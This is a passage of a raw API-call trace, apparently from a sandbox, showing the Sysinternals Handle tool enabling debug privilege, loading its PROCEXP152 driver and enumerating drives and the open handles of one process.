lpData=0x12fc40*=0x1, lpcbData=0x12fc48*=0x4) returned 0x0 [0179.933] RegCloseKey (hKey=0x78) returned 0x0 [0179.933] GetLastError () returned 0x0 [0179.933] SetLastError (dwErrCode=0x0) [0179.933] GetLastError () returned 0x0 [0179.933] SetLastError (dwErrCode=0x0) [0179.934] RegCreateKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", phkResult=0x12fc38 | out: phkResult=0x12fc38*=0x78) returned 0x0 [0179.934] RegSetValueExW (in: hKey=0x78, lpValueName="EulaAccepted", Reserved=0x0, dwType=0x4, lpData=0x12fc30*=0x1, cbData=0x4 | out: lpData=0x12fc30*=0x1) returned 0x0 [0179.934] RegCloseKey (hKey=0x78) returned 0x0 [0179.934] GetLastError () returned 0x0 [0179.934] SetLastError (dwErrCode=0x0) [0179.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x0) returned 1 [0179.934] GetCurrentProcess () returned 0xffffffffffffffff [0179.935] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x12e3e0 | out: TokenHandle=0x12e3e0*=0x78) returned 1 [0179.935] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12e3e8 | out: lpLuid=0x12e3e8*(LowPart=0x14, HighPart=0)) returned 1 [0180.228] AdjustTokenPrivileges (in: TokenHandle=0x78, DisableAllPrivileges=0, NewState=0x12e3f0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0180.228] GetLastError () returned 0x0 [0180.228] CloseHandle (hObject=0x78) returned 1 [0180.228] GetLastError () returned 0x0 [0180.228] SetLastError (dwErrCode=0x0) [0180.228] GetLastError () returned 0x0 [0180.228] SetLastError (dwErrCode=0x0) [0180.228] CreateFileW (lpFileName="\\\\.\\PROCEXP152" (normalized: "\\device\\procexp152"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0180.229] SeCaptureSubjectContext (in: SubjectContext=0xfffff88002aab598 | out: SubjectContext=0xfffff88002aab598) [0180.229] ExGetPreviousMode () returned 0xfffffa80030cda01 [0180.229] SePrivilegeCheck (in: RequiredPrivileges=0xfffff88002aab5b8, SubjectSecurityContext=0xfffff88002aab598, AccessMode=0x1 | out: RequiredPrivileges=0xfffff88002aab5b8) returned 1 [0180.229] SeReleaseSubjectContext (in: SubjectContext=0xfffff88002aab598 | out: SubjectContext=0xfffff88002aab598) [0180.229] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0180.231] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.231] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryInformationProcess") returned 0x77ab14a0 [0180.231] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.231] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryInformationThread") returned 0x77ab1560 [0180.232] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.232] GetProcAddress (hModule=0x77a60000, lpProcName="NtQuerySystemInformation") returned 0x77ab1670 [0180.232] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.233] GetProcAddress (hModule=0x77a60000, lpProcName="NtQuerySymbolicLinkObject") returned 0x77ab25d0 [0180.233] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.233] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryDirectoryObject") returned 0x77ab2440 [0180.233] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.234] GetProcAddress (hModule=0x77a60000, lpProcName="NtOpenSymbolicLinkObject") returned 0x77ab2310 [0180.234] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.234] GetProcAddress (hModule=0x77a60000, lpProcName="NtOpenDirectoryObject") returned 0x77ab1890 [0180.235] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.235] GetProcAddress (hModule=0x77a60000, lpProcName="NtQueryObject") returned 0x77ab1410 [0180.235] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.235] GetProcAddress (hModule=0x77a60000, lpProcName="NtQuerySection") returned 0x77ab1820 [0180.236] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.236] GetProcAddress (hModule=0x77a60000, lpProcName="RtlInitAnsiString") returned 0x77ab7f80 [0180.236] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.236] GetProcAddress (hModule=0x77a60000, lpProcName="RtlInitUnicodeString") returned 0x77ab5280 [0180.237] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.237] GetProcAddress (hModule=0x77a60000, lpProcName="RtlAnsiStringToUnicodeString") returned 0x77ab4e50 [0180.237] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.237] GetProcAddress (hModule=0x77a60000, lpProcName="RtlFreeUnicodeString") returned 0x77ab5610 [0180.238] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.238] GetProcAddress (hModule=0x77a60000, lpProcName="RtlFreeAnsiString") returned 0x77ab5610 [0180.238] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77a60000 [0180.238] GetProcAddress (hModule=0x77a60000, lpProcName="RtlUnicodeStringToAnsiString") returned 0x77ab5c50 [0180.238] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x0, Length=0x0, ResultLength=0x0 | out: SystemInformation=0x0, ResultLength=0x0) returned 0xc0000004 [0180.239] GetLastError () returned 0x0 [0180.239] SetLastError (dwErrCode=0x0) [0180.239] GetLastError () returned 0x0 [0180.239] SetLastError (dwErrCode=0x0) [0180.239] GetDriveTypeW (lpRootPathName="A:\\") returned 0x1 [0180.240] GetLastError () returned 0x0 [0180.240] SetLastError (dwErrCode=0x0) [0180.240] GetLastError () returned 0x0 [0180.240] SetLastError (dwErrCode=0x0) [0180.240] GetDriveTypeW (lpRootPathName="B:\\") returned 0x1 [0180.241] GetLastError () returned 0x0 [0180.241] SetLastError (dwErrCode=0x0) [0180.241] GetLastError () returned 0x0 [0180.241] SetLastError (dwErrCode=0x0) [0180.241] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0180.242] GetLastError () returned 0x0 [0180.242] SetLastError (dwErrCode=0x0) [0180.242] GetLastError () returned 0x0 [0180.242] SetLastError (dwErrCode=0x0) [0180.242] RtlInitUnicodeString (in: DestinationString=0x12dac0, SourceString="\\DosDevices\\C:" | out: DestinationString="\\DosDevices\\C:") [0180.242] NtOpenSymbolicLinkObject (in: SymbolicLinkHandle=0x12db00, DesiredAccess=0x20001, ObjectAttributes=0x12db10 | out: SymbolicLinkHandle=0x12db00*=0xbc) returned 0x0 [0180.243] NtQuerySymbolicLinkObject (in: SymLinkObjHandle=0xbc, LinkTarget=0x12dbe0, DataWritten=0x12db08 | out: LinkTarget="\\Device\\HarddiskVolume1", DataWritten=0x12db08) returned 0x0 [0180.243] CloseHandle (hObject=0xbc) returned 1 [0180.243] RtlInitUnicodeString (in: DestinationString=0x12dac0, SourceString="\\Device\\HarddiskVolume1" | out: DestinationString="\\Device\\HarddiskVolume1") [0180.243] NtOpenSymbolicLinkObject (in: SymbolicLinkHandle=0x12db00, DesiredAccess=0x20001, ObjectAttributes=0x12db10 | out: SymbolicLinkHandle=0x12db00*=0x0) returned 0xc0000024 [0180.244] GetLastError () returned 0x0 [0180.244] SetLastError (dwErrCode=0x0) [0180.244] GetLastError () returned 0x0 [0180.244] SetLastError (dwErrCode=0x0) [0180.244] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0180.245] GetLastError () returned 0x0 [0180.245] SetLastError (dwErrCode=0x0) [0180.245] GetLastError () returned 0x0 [0180.245] SetLastError (dwErrCode=0x0) [0180.245] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0180.245] GetLastError () returned 0x0 [0180.246] SetLastError (dwErrCode=0x0) [0180.246] GetLastError () returned 0x0 [0180.246] SetLastError (dwErrCode=0x0) [0180.246] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0180.246] GetLastError () returned 0x0 [0180.247] SetLastError (dwErrCode=0x0) [0180.247] GetLastError () returned 0x0 [0180.247] SetLastError (dwErrCode=0x0) [0180.247] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0180.247] GetLastError () returned 0x0 [0180.248] SetLastError (dwErrCode=0x0) [0180.248] GetLastError () returned 0x0 [0180.248] SetLastError (dwErrCode=0x0) [0180.248] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0180.248] GetLastError () returned 0x0 [0180.248] SetLastError (dwErrCode=0x0) [0180.249] GetLastError () returned 0x0 [0180.249] SetLastError (dwErrCode=0x0) [0180.249] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0180.249] GetLastError () returned 0x0 [0180.249] SetLastError (dwErrCode=0x0) [0180.250] GetLastError () returned 0x0 [0180.250] SetLastError (dwErrCode=0x0) [0180.250] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0180.250] GetLastError () returned 0x0 [0180.250] SetLastError (dwErrCode=0x0) [0180.250] GetLastError () returned 0x0 [0180.251] SetLastError (dwErrCode=0x0) [0180.251] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0180.251] GetLastError () returned 0x0 [0180.251] SetLastError (dwErrCode=0x0) [0180.251] GetLastError () returned 0x0 [0180.251] SetLastError (dwErrCode=0x0) [0180.251] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0180.252] GetLastError () returned 0x0 [0180.252] SetLastError (dwErrCode=0x0) [0180.252] GetLastError () returned 0x0 [0180.252] SetLastError (dwErrCode=0x0) [0180.252] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0180.253] GetLastError () returned 0x0 [0180.254] SetLastError (dwErrCode=0x0) [0180.254] GetLastError () returned 0x0 [0180.254] SetLastError (dwErrCode=0x0) [0180.254] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0180.255] GetLastError () returned 0x0 [0180.255] SetLastError (dwErrCode=0x0) [0180.255] GetLastError () returned 0x0 [0180.255] SetLastError (dwErrCode=0x0) [0180.255] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0180.256] GetLastError () returned 0x0 [0180.256] SetLastError (dwErrCode=0x0) [0180.256] GetLastError () returned 0x0 [0180.256] SetLastError (dwErrCode=0x0) [0180.256] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.257] GetLastError () returned 0x0 [0180.257] SetLastError (dwErrCode=0x0) [0180.257] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0180.257] GetLastError () returned 0x0 [0180.258] SetLastError (dwErrCode=0x0) [0180.258] GetLastError () returned 0x0 [0180.258] SetLastError (dwErrCode=0x0) [0180.258] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0180.258] GetLastError () returned 0x0 [0180.258] SetLastError (dwErrCode=0x0) [0180.258] GetLastError () returned 0x0 [0180.258] SetLastError (dwErrCode=0x0) [0180.259] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0180.259] GetLastError () returned 0x0 [0180.259] SetLastError (dwErrCode=0x0) [0180.259] GetLastError () returned 0x0 [0180.259] SetLastError (dwErrCode=0x0) [0180.259] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0180.260] GetLastError () returned 0x0 [0180.260] SetLastError (dwErrCode=0x0) [0180.260] GetLastError () returned 0x0 [0180.260] SetLastError (dwErrCode=0x0) [0180.260] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetLastError () returned 0x0 [0180.261] SetLastError (dwErrCode=0x0) [0180.261] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0180.262] GetLastError () returned 0x0 [0180.262] SetLastError (dwErrCode=0x0) [0180.262] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetLastError () returned 0x0 [0180.263] SetLastError (dwErrCode=0x0) [0180.263] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0180.263] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4000) returned 0x2f8b30 [0180.264] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2f8b30, Length=0x4000, ResultLength=0x12e420 | out: SystemInformation=0x2f8b30, ResultLength=0x12e420*=0x6e0d8) returned 0xc0000004 [0180.269] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8b30 | out: hHeap=0x2d0000) returned 1 [0180.269] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8000) returned 0x2f8b30 [0180.270] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2f8b30, Length=0x8000, ResultLength=0x12e420 | out: SystemInformation=0x2f8b30, ResultLength=0x12e420*=0x6e038) returned 0xc0000004 [0180.447] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8b30 | out: hHeap=0x2d0000) returned 1 [0180.447] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10000) returned 0x2f8b30 [0180.448] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2f8b30, Length=0x10000, ResultLength=0x12e420 | out: SystemInformation=0x2f8b30, ResultLength=0x12e420*=0x6e038) returned 0xc0000004 [0180.451] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8b30 | out: hHeap=0x2d0000) returned 1 [0180.451] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x20000) returned 0x2f8b30 [0180.451] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2f8b30, Length=0x20000, ResultLength=0x12e420 | out: SystemInformation=0x2f8b30, ResultLength=0x12e420*=0x6e038) returned 0xc0000004 [0180.457] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8b30 | out: hHeap=0x2d0000) returned 1 [0180.457] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x40000) returned 0x2f8b30 [0180.457] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x2f8b30, Length=0x40000, ResultLength=0x12e420 | out: SystemInformation=0x2f8b30, ResultLength=0x12e420*=0x6e038) returned 0xc0000004 [0180.467] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8b30 | out: hHeap=0x2d0000) returned 1 [0180.467] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x80000) returned 0x1df0080 [0180.477] NtQuerySystemInformation (in: SystemInformationClass=0x40, SystemInformation=0x1df0080, Length=0x80000, ResultLength=0x12e420 | out: SystemInformation=0x1df0080, ResultLength=0x12e420*=0x6da70) returned 0x0 [0182.016] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4000) returned 0x2f8b30 [0182.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2f8b30, Length=0x4000, ResultLength=0x12e420 | out: SystemInformation=0x2f8b30, ResultLength=0x12e420*=0x147f8) returned 0xc0000004 [0182.017] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8b30 | out: hHeap=0x2d0000) returned 1 [0182.017] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8000) returned 0x2f8b30 [0182.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2f8b30, Length=0x8000, ResultLength=0x12e420 | out: SystemInformation=0x2f8b30, ResultLength=0x12e420*=0x147f8) returned 0xc0000004 [0182.017] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8b30 | out: hHeap=0x2d0000) returned 1 [0182.017] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc000) returned 0x2f8b30 [0182.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2f8b30, Length=0xc000, ResultLength=0x12e420 | out: SystemInformation=0x2f8b30, ResultLength=0x12e420*=0x147f8) returned 0xc0000004 [0182.017] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8b30 | out: hHeap=0x2d0000) returned 1 [0182.017] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10000) returned 0x2f8b30 [0182.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2f8b30, Length=0x10000, ResultLength=0x12e420 | out: SystemInformation=0x2f8b30, ResultLength=0x12e420*=0x147f8) returned 0xc0000004 [0182.018] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8b30 | out: hHeap=0x2d0000) returned 1 [0182.018] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x14000) returned 0x2f8b30 [0182.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2f8b30, Length=0x14000, ResultLength=0x12e420 | out: SystemInformation=0x2f8b30, ResultLength=0x12e420*=0x147f8) returned 0xc0000004 [0182.018] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f8b30 | out: hHeap=0x2d0000) returned 1 [0182.018] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18000) returned 0x2f8b30 [0182.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2f8b30, Length=0x18000, ResultLength=0x12e420 | out: SystemInformation=0x2f8b30, ResultLength=0x12e420*=0x147f8) returned 0x0 [0182.019] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xad0) returned 0xbc [0182.019] GetCurrentProcess () returned 0xffffffffffffffff [0182.019] DuplicateHandle (in: hSourceProcessHandle=0xbc, hSourceHandle=0x28, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0182.019] CloseHandle (hObject=0xbc) returned 1 [0182.019] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.019] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x80) returned 0x2f4c70 [0182.019] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.020] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.020] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.020] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0182.020] PsLookupProcessByProcessId (in: ProcessId=0xad0, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.020] PsAcquireProcessExitSynchronization () returned 0x0 [0182.020] KeStackAttachProcess (in: PROCESS=0xfffffa80032633a0, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80032633a0, ApcState=0xfffff88002aab5d0) [0182.020] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8002fc2680, HandleInformation=0x0) returned 0x0 [0182.020] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.020] PsReleaseProcessExitSynchronization () returned 0x2 [0182.020] ObfDereferenceObject (Object=0xfffffa80032633a0) returned 0xc [0182.021] ObQueryNameString (in: Object=0xfffffa8002fc2680, ObjectNameInfo=0xfffffa8003145044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003145044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.021] ObfDereferenceObject (Object=0xfffffa8002fc2680) returned 0x4 [0182.021] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.021] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.021] CloseHandle (hObject=0xc0) returned 1 [0182.021] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xad0) returned 0xc0 [0182.021] GetCurrentProcess () returned 0xffffffffffffffff [0182.021] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x20, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xbc) returned 1 [0182.021] CloseHandle (hObject=0xc0) returned 1 [0182.021] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.021] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x2f4c70 [0182.021] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.022] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.022] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.022] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0182.022] PsLookupProcessByProcessId (in: ProcessId=0xad0, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.022] PsAcquireProcessExitSynchronization () returned 0x0 [0182.022] KeStackAttachProcess (in: PROCESS=0xfffffa80032633a0, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80032633a0, ApcState=0xfffff88002aab5d0) [0182.022] ObReferenceObjectByHandle (in: Handle=0x20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8003098850, HandleInformation=0x0) returned 0x0 [0182.022] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.022] PsReleaseProcessExitSynchronization () returned 0x2 [0182.022] ObfDereferenceObject (Object=0xfffffa80032633a0) returned 0xc [0182.022] ObQueryNameString (in: Object=0xfffffa8003098850, ObjectNameInfo=0xfffffa8003177044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003177044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.022] ObfDereferenceObject (Object=0xfffffa8003098850) returned 0x4 [0182.022] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.022] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.022] CloseHandle (hObject=0xbc) returned 1 [0182.022] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xad0) returned 0xbc [0182.022] GetCurrentProcess () returned 0xffffffffffffffff [0182.022] DuplicateHandle (in: hSourceProcessHandle=0xbc, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0182.022] CloseHandle (hObject=0xbc) returned 1 [0182.022] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.023] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x2f4c70 [0182.023] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.023] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.023] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.023] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e70090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e70090*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0182.023] PsLookupProcessByProcessId (in: ProcessId=0xad0, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.023] PsAcquireProcessExitSynchronization () returned 0x0 [0182.023] KeStackAttachProcess (in: PROCESS=0xfffffa80032633a0, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80032633a0, ApcState=0xfffff88002aab5d0) [0182.023] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa800269a940, HandleInformation=0x0) returned 0x0 [0182.023] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.023] PsReleaseProcessExitSynchronization () returned 0x2 [0182.023] ObfDereferenceObject (Object=0xfffffa80032633a0) returned 0xc [0182.023] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003145044, Length=0x800, ReturnLength=0xfffff88002aab508 | out: ObjectNameInfo=0xfffffa8003145044, ReturnLength=0xfffff88002aab508) returned 0x0 [0182.023] ObfDereferenceObject (Object=0xfffffa800269a940) returned 0x2 [0182.023] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.023] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e70090 | out: hHeap=0x2d0000) returned 1 [0182.023] CloseHandle (hObject=0xc0) returned 1 [0182.023] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xad0) returned 0xc0 [0182.023] GetCurrentProcess () returned 0xffffffffffffffff [0182.023] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x18, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xbc) returned 1 [0182.023] CloseHandle (hObject=0xc0) returned 1 [0182.023] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.023] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x80) returned 0x2f4c70 [0182.023] NtQueryObject (in: Handle=0xbc, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0182.024] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0182.024] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e70090 [0182.024] DeviceIoControl 